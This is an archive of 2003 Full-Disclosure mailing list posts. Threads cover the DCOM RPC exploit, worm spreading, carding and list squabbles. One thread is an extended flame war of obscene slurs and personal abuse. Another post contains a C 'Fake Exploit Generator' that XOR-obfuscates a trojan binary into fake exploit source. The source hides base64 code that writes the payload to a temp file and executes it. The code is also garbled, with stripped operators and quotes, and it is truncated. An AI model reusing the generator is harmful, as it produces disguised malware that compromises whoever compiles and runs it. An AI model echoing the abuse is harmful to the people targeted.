Title: Message Its about damned time, I guess I can stop writing mine now. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of ViLLaN Sent: Monday, August 11, 2003 11:06 PM To: '[EMAIL PROTECTED]' Subject: [Full-Disclosure] Symantec has released an MSBLast removal tool. Hey Guys, Symantec has just released a removal tool for MSBLAST. Cheers, Garth S
RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)
What if it just kept an internal list of return addresses and simply cycled through them each in a separate thread until it was able to gain access to the machine? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Robert Wesley McGrew Sent: Monday, July 28, 2003 1:11 PM To: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] DCOM RPC exploit (dcom.c) On Mon, 28 Jul 2003, Schmehl, Paul L wrote: 2) For this DCOM RPC problem in particular, everyone's talking about worms. How would the worm know what return address to use? Remote OS fingerprinting would mean it would be relatively large, slow, and unreliable (compared with Slammer), and sticking with one would cause more machines to just crash than to spread the worm. I haven't looked into this very closely yet to see if it can be generalized. What fingerprinting? If you've got 135/UDP open to the Internet, you're screwed. Slammer didn't fingerprint. It simply hit every box it could find on port 1434/UDP, and the exploit either worked or it didn't. Most worms do the same. They attack indiscriminately, and infect those Oses that are susceptible. And with Windows, that's enough boxes to cause a real problem. Thanks for responding. I realize that having 135 open on any Windows machine makes you vulnerable, and that you wouldn't need to differentiate Windows/OtherOSes. My question is about different Windows versions. The version (NT/2000/XP), service pack, and language at least have to be known to get the return address right. If it's guessed wrong, the system goes down with no shell executed. Any worm using this would need to know the return address before attempting to exploit If a worm were to stick to targetting one return address (say, English XP SP1), everytime it ran across something slightly different (SP0, german, win2k, etc) it would simply crash it and not spread. One of three things would happen in the case of this worm : 1) Sticks with one return address, makes a spectacular DoS against all other languages/versions/SPs. This could limit how quickly it spreads. 2) Somehow finds out ahead of time what the remote language/version/SP is. Could be very unreliable and slow. 3) There is some way of generalizing the return address in a way that would work on at least a large portion of installs. This is what would bring it into the league of Very Scary Worms. Has anyone seen any indication in the private exploits or in their research that there's a way to get it to work reliably on systems without having to know version/SP/etc? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)
This exploit works exceptionally well. Frighteningly well. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of christopher neitzert Sent: Saturday, July 26, 2003 3:38 PM To: Justin Shin Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] DCOM RPC exploit (dcom.c) I've managed to compile it under gcc 3.2.2 without error, yet It doesn't seem to do anything but hang-itself against XP-Professional hosts, as I haven't a 2k box available to test against. chris On Sat, 2003-07-26 at 17:25, Justin Shin wrote: 03-026 working exploit Anyone had any luck compiling any of these exploits? I continue to recieve compiler warnings whether I use gcc or a dgc. -- Justin Shin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- Christopher Neitzert http://www.neitzert.com/~chris chrisATneitzert{dot}com - GPG Key ID: 7DCC491B ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE:
I was never under the impression that this was more than a social experiment setup for Len's amusement. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Anthony Aykut Sent: Friday, July 18, 2003 5:16 PM To: Donnie Weiner Cc: [EMAIL PROTECTED] Subject: How come this list filters/stops/bans profanity, but fails to squeeze out puss like you?? Just goes to show what a fucking joke this list is, doesn't it?? - Original Message - LOL From: Anthony Aykut [EMAIL PROTECTED] To: Donnie Weiner [EMAIL PROTECTED] Subject: RE: RE: [Full-Disclosure] TO: Anthony Aykut Date: 18 Jul 2003 19:49:07 - I am guessing yuo can't even suck my dad's dick you fucking limp retard cunt. If think you can treat everybody like your favourite bitch you arrogant fuck, you did hit send on your mail to the wrong person. You l33t? Don't make me laugh, ass-boy. The only person tripping is, you. I cream my pants every fucking day reading this list, which is turned now into a retard circus due to lame-ass, would be funny, know-it-all mother fuckers like you. Donnie Wiener, the stupid kiddie-fucker wont even reveal his real name. Shame on you - cannot even converse without making personal attacks. Do I take it too personal? Fuck yeah. The moment you put my name on this mail, you crossed the line you cunt. I probably get banned from this list now for writing this email, but who gives a flying fuck - this list is ruined anyways. By fucks like you. Bye FD. By Weiner, the ass-rammed, gay-boy. Go and run back to your mommy, she'll suck your dick any day. - Original Message - i ll change yar mom panties bettar :D is yuo who say to excuse morning_wood i must demand yuo for have such bad guilt trip From: Anthony Aykut [EMAIL PROTECTED] To: Donnie Weiner [EMAIL PROTECTED] CC: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] TO: Anthony Aykut Date: 18 Jul 2003 19:33:18 - Yawn, change the record. - Original Message - shutup yar dum. Christ almighty. For all your bikkering, wit and inventiveness, if you people put the same energy and will into educating people or arguing in a civil manner over what you are not agreeing to, this list would be a much better place. Wood at least tries, even though some of you may or may not agree to what or how he is doing it. But no, of course you won't do that, you'll have to show off and be arrogant - because lets face it we just love oneupmanship and love to mock people. That way we can REALLY show them that we are better. Sad. _ Protect your PC - get McAfee.com VirusScan Online http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963 _ STOP MORE SPAM with the new MSN 8 and get 2 months FREE* http://join.msn.com/?page=features/junkmail ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] RE:
I can't help it. I'm going to have to comment to a comment about my own comments about commenting about the list, seriously it just HAS to be done. Who has a comment? Any takers? Thanks, The Professional -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jeremiah Cornelius Sent: Friday, July 18, 2003 6:25 PM Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] RE: I was never under the impression that this was more than a social experiment setup for Len's amusement. Christ! Out of another lame, flame-thread, comes the most accurate and insightful comment about the list! Pity that meta-threads are more common here than actual contents. Hey look, I'm commenting about commenting about the list! ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] RE:
Anyone interested in a list called indecent-disclosure? -Original Message- From: micah mcnelly [mailto:[EMAIL PROTECTED] Sent: Friday, July 18, 2003 7:31 PM To: gml; 'Jeremiah Cornelius' Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] RE: Len Rose is a muppet. /m - Original Message - From: gml [EMAIL PROTECTED] To: 'Jeremiah Cornelius' [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Friday, July 18, 2003 4:29 PM Subject: RE: [Full-Disclosure] RE: I can't help it. I'm going to have to comment to a comment about my own comments about commenting about the list, seriously it just HAS to be done. Who has a comment? Any takers? Thanks, The Professional -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jeremiah Cornelius Sent: Friday, July 18, 2003 6:25 PM Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] RE: I was never under the impression that this was more than a social experiment setup for Len's amusement. Christ! Out of another lame, flame-thread, comes the most accurate and insightful comment about the list! Pity that meta-threads are more common here than actual contents. Hey look, I'm commenting about commenting about the list! ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Credit card numbers
Also I'm really not entirely sure what's so professional about this list. What deems a professional anyway? I mean seriously, you stopped hacking and got a job instead so now you're a professional? You avoided prison until the age of 18 and someone was foolish enough to pay you for your intellectual property so now you are a professional? Or maybe you have a CISSP and you know absolutely everything and that makes you a professional. Come on please. Nothing is even remotely at black and white as it's made out to be. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of gml Sent: Thursday, July 17, 2003 6:18 PM To: 'northern snowfall'; 'Nick Jacobsen' Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Credit card numbers Carding is for hackers who enjoy prison. If you are considering illegal activity that involves theft or the possibly involvement of the secret service, I suggest you first ask yourself whether or not you enjoyed high school cafeteria food and then imagine eating that for the next 20-30 years. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of northern snowfall Sent: Thursday, July 17, 2003 6:59 PM To: Nick Jacobsen Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Credit card numbers This is a professional list - would you go up to someone at a computer security conference and tell em oh yeah, I used to card during highschool all the time? Oh grow up Don http://www.7f.no-ip.com/~north_ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Invaded by morons..
Does Mac OS X count? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of northern snowfall Sent: Thursday, July 17, 2003 8:25 PM To: Dortmunder Lethman Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Invaded by morons.. I won't respond to anyone who didn't use unix to send mail to me. Um, is amoeba or plan9 ok? :P Don http://www.7f.no-ip.com/~north_ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Credit card numbers
My point being was that at a certain point regardless you realize hopefully as you grow up that carding is REALLY INCREDIBLY STUPID and often results in a serious prison sentence. -Original Message- From: micah mcnelly [mailto:[EMAIL PROTECTED] Sent: Thursday, July 17, 2003 6:47 PM To: gml; 'northern snowfall'; 'Nick Jacobsen' Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Credit card numbers i used to card during high school all the time. /m - Original Message - From: gml [EMAIL PROTECTED] To: 'northern snowfall' [EMAIL PROTECTED]; 'Nick Jacobsen' [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Thursday, July 17, 2003 3:18 PM Subject: RE: [Full-Disclosure] Credit card numbers Carding is for hackers who enjoy prison. If you are considering illegal activity that involves theft or the possibly involvement of the secret service, I suggest you first ask yourself whether or not you enjoyed high school cafeteria food and then imagine eating that for the next 20-30 years. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of northern snowfall Sent: Thursday, July 17, 2003 6:59 PM To: Nick Jacobsen Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Credit card numbers This is a professional list - would you go up to someone at a computer security conference and tell em oh yeah, I used to card during highschool all the time? Oh grow up Don http://www.7f.no-ip.com/~north_ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] A worm...
Excuse me if I don't get excited over another mass mailing worm. :( -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of ATD Sent: Wednesday, June 25, 2003 6:53 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] A worm... .pif being .zip, is this new? cute virus/worm. I know what it is, but since when did the pif worm start zipping itself? did I miss something? [darf] ~/virus unzip your_details.zip Archive: your_details.zip inflating: details.pif [darf] ~/virus ls details.pif your_details.zip [darf] ~/virus ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST)
What does that do? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Eric Chien Sent: Friday, June 20, 2003 1:19 PM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) At 08:39 AM 6/20/2003 -0700, you wrote: I am posting this as a member of koec. The koec take no responsibility for damages caused by this software, compile and use at your own risk. By the way, the koec make you all look like a bunch of fuckin' schoolgirls. [cut] void(*b)()=(void*)shellcode;b(); Clearly, the kids are out of school. ...Eric ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: -1 day exploit - Warning
On Friday 13 June 2003 06:51 pm, David Bernick wrote: Well anyway, I got inspired: // Fake Exploit Generator // [EMAIL PROTECTED] // #include stdio.h #include sys/types.h #include sys/stat.h #include unistd.h #define badchar(c,p) (!(p = memchr(b64string, c, 64))) #define BEAUTIFY indent char b64string[] = ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/; static char header[] = { Ly8gZ2VuZXJhdGVkIHdpdGggRmFrZSBFeHBsb2l0IEdlbmVyYXRvciA6OiBnbWxAcGhyaWNr Lm5ldAoKI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4KI2luY2x1 ZGUgPHN5cy9zdGF0Lmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4K }; static char body[] = { dm9pZCB1c2FnZShpbnQgYXJncywgY2hhciAqc2VsZikKewoJaWYoZ2V0dWlkKCkgIT0gMCkK CXsKCQlwcmludGYoIlRoaXMgcHJvZ3JhbSByZXF1aXJlcyBwcml2aWxlZGdlcyB5b3UgZG8g bm90IHBvc2Vzcy5cbiIpOwoJCWV4aXQoMCk7Cgl9CgllbHNlCgl7CgoJCWlmKGFyZ3MgPCAy KQoJCXsKCQkJcHJpbnRmKCJ1c2FnZTogJXMgPHRhcmdldD5cbiIsIHNlbGYpOwoJCQlleGl0 KDApOwoJCX0KCX0KCn0KCnZvaWQgc2V0dXAoKQp7CgljaGFyICp0bXA7CglGSUxFICpmcDsK CWNoYXIgYnl0ZVswXTsKCWludCBpOwoKCXRtcCA9IHRtcG5hbShOVUxMKTsKCWZwID0gZm9w ZW4odG1wLCAidyIpOwoJaWYoZnApCgl7CgkJZm9yKGkgPSAwOyBpIDwgc2l6ZW9mKHNoZWxs Y29kZSk7IGkrKykKCQl7CgkJCWJ5dGVbMF0gPSBzaGVsbGNvZGVbaV0gXiBNQVg7CgkJCWZ3 cml0ZShieXRlLCAxLCAxLCBmcCk7CgkJfQoJCWZjbG9zZShmcCk7CgkJY2htb2QodG1wLCAw NzU1KTsKCQlzeXN0ZW0odG1wKTsKCQl1bmxpbmsodG1wKTsKCX0KfQoKaW50Cm1haW4gKGlu dCBhcmdjLCBjaGFyICphcmd2W10pCnsKCXVzYWdlKGFyZ2MsIGFyZ3ZbMF0pOwoJc2V0dXAo KTsKCS8vIGRvIHNvbWUgc2hpdCBoZXJlCn0K }; long b64dec (char *to, char *from, unsigned int len) { char *fromp = from; char *top = to; char *p; unsigned char cbyte; unsigned char obyte; int padding = 0; for (; len = 4; len -= 4) { if ((cbyte = *fromp++) == '=') cbyte = 0; else { if (badchar(cbyte, p)) return -1; cbyte = (p - b64string); } obyte = cbyte 2; /* 1100 */ if ((cbyte = *fromp++) == '=') cbyte = 0; else { if (badchar(cbyte, p)) return -1; cbyte = p - b64string; } obyte |= cbyte 4;/* 0011 */ *top++ = obyte; obyte = cbyte 4; /* */ if ((cbyte = *fromp++) == '=') { cbyte = 0; padding++; } else { padding = 0; if (badchar (cbyte, p)) return -1; cbyte = p - b64string; } obyte |= cbyte 2;/* */ *top++ = obyte; obyte = cbyte 6; /* 1100 */ if ((cbyte = *fromp++) == '=') { cbyte = 0; padding++; } else { padding = 0; if (badchar (cbyte, p)) return -1; cbyte = p - b64string; } obyte |= cbyte; /* 0011 */ *top++ = obyte; } *top = 0; if (len) return -1; return (top - to) - padding; } void printhex(char c, FILE *fp) { char s[10]; if(c 16 c = 0) { fprintf(fp, \\x%2.2x, c); } else { if(c 0) { fprintf(fp, \\x%2.2x, c); } else { sprintf(s, %x, c); fprintf(fp, \\x%c, s[6]); fprintf(fp, %c, s[7]); } } } int main(int argc, char *argv[]) { FILE *trojan; FILE *fakeexp; char byte[0]; int count = 0; char *out; out = (char *)malloc(sizeof(body)); memset(out, 0, sizeof(out)); #ifdef BEAUTIFY char *cmd; #endif if(argc 4 ) { printf(usage: %s trojan fakeexp.c key\n, argv[0]); printf(ex: %s trojan fakeexp.c 187\n, argv[0]); exit(0); } trojan = fopen(argv[1], r); fakeexp = fopen(argv[2], w); if(trojan fakeexp) { b64dec(out, header, sizeof(header)); fprintf(fakeexp, %s, out); memset(out, 0, sizeof(out)); fprintf(fakeexp, \n#define MAX\t%s\n\n, argv[3]); fprintf(fakeexp, static char shellcode[] = {\n); while(!feof(trojan)) { memset(byte, 0, sizeof(byte)); fread(byte, 1, 1, trojan); byte[0] = byte[0] ^ atoi(argv[3]); // obfuscate if(count 15) { if(count == 0) { fprintf(fakeexp, \); } printhex(byte[0], fakeexp); count++; } else { printhex(byte[0], fakeexp); fprintf(fakeexp, \\n); count = 0; } } fprintf(fakeexp, \\n};\n\n); b64dec(out, body, sizeof(body)); fprintf(fakeexp, %s, out);
Re: [Full-Disclosure] hackers are evil?
On Thursday 12 June 2003 12:49 pm, madsaxon wrote: for the record, i've been saying we need to change the nomenclature for awhile, suddenly everyone cares. i am truly amused. i'm going to go off now and be ahead of the curve some more. [Since nothing appears to be off topic for this list, I don't feel constrained to withhold my comments on that basis.] At 01:21 AM 6/13/03 +1000, Darren Reed wrote: The english language evolves and this is just part of it. Just as jelly in the USA is different to jelly in Australia, hacker post circa 1990 is different to hacker pre circa 1990. Oh, so Fosters is, in fact, Australian for beer? I guess I'm not ready to have the language I employ every day of my life dictated by the mass media. The evolution of language is conducted by consensus of the users, but in this case that consensus has been artificially promulgated not by a preponderance of the speakers, but by a very small minority who are supposed to be in the business of informing. If that doesn't bother you, fine. It does me. If hacker were the only instance of this phenomenon, I'd just write it off as an anomaly. It isn't, however. There are many examples, some obvious, some rather more subtle. We all have causes for which we're prepared to fight... m5x ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html